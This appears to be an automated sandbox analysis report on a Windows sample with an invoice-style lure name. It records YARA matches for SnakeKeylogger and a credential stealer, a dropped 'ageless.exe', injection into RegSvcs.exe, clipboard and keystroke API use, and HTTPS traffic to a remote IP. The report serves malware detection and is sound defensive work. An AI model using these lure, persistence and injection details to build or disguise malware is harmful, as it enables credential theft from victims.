                  Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49832 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49962 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49905
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49927
                  Source: unknown | Network traffic detected: HTTP traffic on port 49905 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49946
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49853 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49962 version: TLS 1.2
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00FA9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                  System Summary

                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_351a848f-7
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_582379ec-c
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, 00000001.00000003.1357102151.0000000003BE1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d51e3a06-0
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, 00000001.00000003.1357102151.0000000003BE1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6252972b-1
                  Source: ageless.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ageless.exe, 00000002.00000000.1357613204.0000000000E22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_00884192-1
                  Source: ageless.exe, 00000002.00000000.1357613204.0000000000E22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_16281119-6
                  Source: ageless.exe, 00000008.00000002.1573339860.0000000000E22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ac980974-c
                  Source: ageless.exe, 00000008.00000002.1573339860.0000000000E22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_60bae93a-e
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7c785d71-8
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d2b9bcf0-5
                  Source: ageless.exe.1.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_97ce39b0-f
                  Source: ageless.exe.1.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1d2bf571-6
                  Source: initial sampleStatic PE information: Filename: QUOTATION REQUIRED_Enatel s.r.l..exe
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7D5EB: CreateFileW,DeviceIoControl,CloseHandle,1_2_00F7D5EB
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00F71201
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00F7E8F6
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DCE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00DCE8F6
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F180601_2_00F18060
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F820461_2_00F82046
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F782981_2_00F78298
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F4E4FF1_2_00F4E4FF
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F4676B1_2_00F4676B
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00FA48731_2_00FA4873
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F1CAF01_2_00F1CAF0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F3CAA01_2_00F3CAA0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F2CC391_2_00F2CC39
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F46DD91_2_00F46DD9
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F191C01_2_00F191C0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F2B1191_2_00F2B119
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F313941_2_00F31394
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F317061_2_00F31706
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F3781B1_2_00F3781B
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F319B01_2_00F319B0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F2997D1_2_00F2997D
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F179201_2_00F17920
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F37A4A1_2_00F37A4A
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F37CA71_2_00F37CA7
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F31C771_2_00F31C77
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F49EEE1_2_00F49EEE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F9BE441_2_00F9BE44
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F31F321_2_00F31F32
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_016003681_2_01600368
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_015FC87F1_2_015FC87F
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D6BF402_2_00D6BF40
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD20462_2_00DD2046
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D680602_2_00D68060
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DC82982_2_00DC8298
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D9E4FF2_2_00D9E4FF
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D9676B2_2_00D9676B
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DF4873
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D6CAF0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D8CAA0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D7CC39
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D96DD9
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D691C0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D7B119
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D81394
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D81706
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D8781B
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D819B0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D7997D
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D67920
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D87A4A
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D87CA7
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D81C77
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D99EEE
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DEBE44
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D81F32
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_0140D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2C146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C25370
